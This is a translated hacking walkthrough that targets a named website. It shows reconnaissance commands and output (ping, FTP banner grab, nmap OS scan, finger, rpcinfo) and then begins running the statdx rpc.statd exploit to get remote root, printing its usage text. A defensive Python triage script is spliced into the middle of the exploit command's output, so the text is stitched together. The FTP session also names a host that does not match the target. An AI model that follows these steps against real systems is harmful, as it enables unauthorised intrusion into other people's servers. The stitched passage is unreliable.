The purpose of this article is not to teach intrusion; it was written to improve my own skills and to strengthen network administrators against attack.
First, pick the target. Suppose it is www.uc955.com.
Let me first see whether it is even reachable:
The following is a quoted excerpt:
C:\>ping www.uc955.com
Pinging www.uc955.com [202.106.184.200] with 32 bytes of data:
Reply from 202.106.184.200: bytes=32 time=541ms TTL=244
Reply from 202.106.184.200: bytes=32 time=620ms TTL=244
Reply from 202.106.184.200: bytes=32 time=651ms TTL=244
Reply from 202.106.184.200: bytes=32 time=511ms TTL=244
Ping statistics for 202.106.184.200:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 511ms, Maximum = 651ms, Average = 580ms
Heh, not only is it reachable, the latency is decent too...
First telnet in to look at the banner:
C:\>telnet www.uc955.com
遗失对主机的连接。
Now try ftp:
The following is a quoted excerpt:
C:\>ftp www.uc955.com
Connected to www.fbi.gov.tw.
220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.
User (www.uc955.com:(none)):
wu-2.6.1: now we are getting somewhere. This box looks like Red Hat 7.0! That has to be confirmed first, so I connect to my jump host:
The following is a quoted excerpt:
C:\>telnet xxx.xxx.xxx.xxx
Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22smp on an i686
login: fetdog
Password:
bash-2.04$
Fire up the nmap scanner and see what is hiding in there:
The following is a quoted excerpt:
bash-2.04$ nmap -sT -O www.uc955.com
Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
WARNING!  The following files exist and are readable: /usr/local/share/nmap/nmap-services and ./nmap-services.  I am choosing /usr/local/share/nmap/nmap-services for security reasons.  set NMAPDIR=. to give priority to files in your local directory
Interesting ports on (www.uc955.com):
(The 1520 ports scanned but not shown below are in state: closed)
Port       State       Service
25/tcp     open        smtp
79/tcp     open        finger
80/tcp     open        http
111/tcp    open        sunrpc
113/tcp    open        auth
443/tcp    open        https
513/tcp    open        login
514/tcp    open        shell
515/tcp    open        printer
587/tcp    open        submission
1024/tcp   open        kdm
TCP Sequence Prediction: Class=random positive increments
                         Difficulty=3247917 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.16
Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds
That is quite a few open ports, which means more chances of getting in. 79/tcp open finger: look at that one first, although Linux does not have the finger user-list vulnerability.
The following is a quoted excerpt:
bash-2.04$ finger @www.uc955.com
[www.uc955.com]
No one logged on.
Now look at 111/tcp open sunrpc. RPC vulnerabilities have been all the rage lately; who knows whether this RH7 box has one? Take a look first!
The following is a quoted excerpt:
bash-2.04$ rpcinfo -p www.uc955.com
   program vers proto   port  service
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100021    1   udp   1024  nlockmgr
    100021    3   udp   1024  nlockmgr
    100024    1   udp   1025  status
    100024    1   tcp   1024  status
So the rpc.statd service is running. Let's see whether it can be overflowed remotely for a root shell.
The following is a quoted excerpt:
bash-2.04$ ./statdx -h
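The nmap port table and the rpcinfo program table above are exactly the two listings an administrator of this host should have been reading from the other side. The script below is an added example, not part of the original write-up: it parses both listings and flags the legacy services this host exposes (finger, rlogin/rsh, lpd, the portmapper, rpc.statd and rpc.lockd) with a remediation note for each. The sample input is the page's own two listings re-spaced; the risk tables and the advice strings are my own assumptions about what an Internet-facing Linux host of that era should not have had reachable.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the nmap and rpcinfo listings from the
# write-up above, re-spaced. A real audit would feed its own scan output.
NMAP_OUTPUT = """\
Port       State       Service
25/tcp     open        smtp
79/tcp     open        finger
80/tcp     open        http
111/tcp    open        sunrpc
113/tcp    open        auth
443/tcp    open        https
513/tcp    open        login
514/tcp    open        shell
515/tcp    open        printer
587/tcp    open        submission
1024/tcp   open        kdm
"""

RPCINFO_OUTPUT = """\
   program vers proto   port  service
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100021    1   udp   1024  nlockmgr
    100021    3   udp   1024  nlockmgr
    100024    1   udp   1025  status
    100024    1   tcp   1024  status
"""

# Assumed risk table (my own): TCP services that should not be reachable
# from the Internet, keyed by well-known port.
RISKY_PORTS = {
    79:  ("finger", "leaks login/user information; disable fingerd"),
    111: ("sunrpc", "portmapper exposed; firewall 111/tcp+udp and audit RPC services"),
    513: ("rlogin", "rhosts trust, cleartext; replace with ssh"),
    514: ("rsh",    "rhosts trust, cleartext; replace with ssh"),
    515: ("lpd",    "print spooler exposed; restrict to the LAN"),
}

# Assumed risk table (my own): RPC programs flagged by program number,
# since the portmapper assigns their ports dynamically.
RISKY_RPC_PROGRAMS = {
    100024: ("rpc.statd", "NFS lock-status daemon with a history of remote "
                          "root bugs; stop it unless this host serves NFS"),
    100021: ("rpc.lockd", "NFS lock manager; only needed for NFS"),
}


@dataclass(frozen=True)
class Finding:
    source: str      # "nmap" or "rpcinfo"
    identifier: str  # "port/proto" or RPC program number
    name: str
    advice: str


def parse_nmap_ports(text):
    """Return {port: (proto, state, service)} from nmap's port table."""
    ports = {}
    for m in re.finditer(r"^\s*(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", text, re.M):
        ports[int(m.group(1))] = (m.group(2), m.group(3), m.group(4))
    return ports


def parse_rpcinfo(text):
    """Return [(program, vers, proto, port, service)] from rpcinfo -p output."""
    entries = []
    for m in re.finditer(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)\s+(\S+)", text, re.M):
        prog, vers, proto, port, svc = m.groups()
        entries.append((int(prog), int(vers), proto, int(port), svc))
    return entries


def triage(nmap_text, rpcinfo_text):
    """Flag exposed legacy services; returns a sorted, de-duplicated list of Finding."""
    findings = set()
    for port, (proto, state, _service) in parse_nmap_ports(nmap_text).items():
        if state == "open" and port in RISKY_PORTS:
            name, advice = RISKY_PORTS[port]
            findings.add(Finding("nmap", f"{port}/{proto}", name, advice))
    for prog, _vers, _proto, _port, _svc in parse_rpcinfo(rpcinfo_text):
        if prog in RISKY_RPC_PROGRAMS:
            name, advice = RISKY_RPC_PROGRAMS[prog]
            findings.add(Finding("rpcinfo", str(prog), name, advice))
    return sorted(findings, key=lambda f: (f.source, f.identifier))


if __name__ == "__main__":
    for f in triage(NMAP_OUTPUT, RPCINFO_OUTPUT):
        print(f"[{f.source}] {f.identifier:>8} {f.name:<10} {f.advice}")
```

Run against the two listings it reports seven findings: five from the port table (finger, sunrpc, rlogin, rsh, lpd) and two from rpcinfo (rpc.statd and rpc.lockd, each collapsed to one entry even though they register on several versions and protocols). Keying RPC findings on the program number rather than the port is deliberate: the 1024/1025 ports in the listing are whatever the portmapper handed out at boot and will differ on another host.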
statdx by ron1n
Usage: stat [-t] [-p port] [-a addr] [-l len]
            [-o offset] [-w num] [-s secs] [-d type]
-t      attack a tcp dispatcher [udp]